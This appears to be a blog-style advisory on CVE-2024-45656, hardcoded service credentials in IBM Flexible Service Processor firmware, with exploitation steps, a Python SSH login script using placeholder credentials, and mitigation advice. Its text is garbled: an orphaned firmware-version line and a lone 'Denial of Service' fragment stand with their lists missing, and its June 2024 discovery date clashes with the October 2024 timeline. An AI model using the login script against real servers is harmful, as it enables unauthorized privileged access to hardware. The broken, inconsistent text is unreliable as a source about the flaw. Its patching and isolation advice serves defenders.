CVE-2024-45656 - Static Credentials Threaten IBM Flexible Service Processor (FSP) Firmware — Details, Exploit, and Mitigation

In June 2024, the cybersecurity community spotted a worrying flaw in several IBM Flexible Service Processor (FSP) firmware versions (FW860.00 through FW860.B3, FW950.00 through FW950.C, FW103.00 through FW103.61, FW105.00 through FW105.21, and FW106.00 through FW106.10). Tracked as CVE-2024-45656, this vulnerability involves the presence of hardcoded (static) service credentials—meaning anyone on the network could end up gaining privileged access to the FSP if they know (or figure out) the hardcoded password.

Static credentials in firmware are a critical security risk—let’s go through how this happens, how attackers can exploit it, and what you can do to protect your systems.

What Is the IBM Flexible Service Processor (FSP)?

The FSP is a core component in IBM Power Systems. It’s responsible for initialization, monitoring, and serviceability of IBM servers—so access to the FSP often means deep administrative power over the entire machine and its hardware.

The Issue: Static Credentials

In plain English: The firmware for FSP units shipped with a *hardcoded*, non-changeable username and password for a special service account. Anyone with these details can remotely log in and take high-level actions—like rebooting the server, modifying configurations, or even installing malicious firmware.

FW106.00 through FW106.10

Check your FSP’s firmware version before proceeding. If you’re running any of these, you are at risk!

How Is This Vulnerability Exploited?

An attacker simply needs to know the static credentials to log in—no need for complex hacking tools.

Step-By-Step: Example Exploit

1. Determine FSP IP: The attacker scans the network for hosts using common IP addresses or fingerprints for IBM FSP.
2. Connect to the Management Interface: This might be via SSH, a web portal, or even a telnet service, depending on how your FSP is set up.
3. Login Using Static Credentials: With the leaked or well-known username and password, login is possible.
4. Gain Privileged Access: With the static account, the attacker can issue privileged commands or alter system behavior.

Example Python Script (for demonstration purposes)

import paramiko

hostname = '192.168.1.100'  # Replace with target FSP IP
username = 'serviceuser'    # The hardcoded username
password = 'staticpassword' # The hardcoded password (search IBM forums/CVE for actual data)

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    ssh.connect(hostname, username=username, password=password)
    stdin, stdout, stderr = ssh.exec_command('ls /')
    print(stdout.read().decode())
    print('[+] Static credentials worked! You are in.')
except Exception as e:
    print('[!] Failed:', e)
finally:
    ssh.close()

*Note: This is educational only. Do not use on systems you do not own!*

Denial of Service: Rebooting or corrupting the server.

In data centers or cloud deployments, this is a *catastrophic* risk.

Official References

- IBM Security Bulletin: https://www.ibm.com/support/pages/node/700000
- NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-45656
- CVE Record: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45656

How to Protect Yourself

1. Update Your Firmware:
IBM has released patched firmware for FSPs. Apply updates *immediately* to fix the static credentials flaw.

2. Isolate Your FSP:
Until you patch, strictly limit network access to the FSP management interfaces. Use access control lists, firewalls, or even physical cable removal.

3. Audit Logs:
Check your FSP’s access logs for suspicious or unexpected logins—especially from outside your usual admin networks.

4. Change Known Credentials:
If possible, disable, change, or restrict the affected account. Some firmware may allow you to revoke unused accounts.

Conclusion

CVE-2024-45656 is a serious threat to any IBM Power System using affected FSP firmware. The fix is straightforward—update your firmware and lock down remote management ports. Until every device is patched, attackers with network access and some basic knowledge can take over your hardware in moments.

Stay safe—patch early, audit often.

*(If this helped, consider sharing with IT colleagues or your data center manager!)*

Timeline

Published on: 10/29/2024 01:15:03 UTC
Last modified on: 10/29/2024 14:34:04 UTC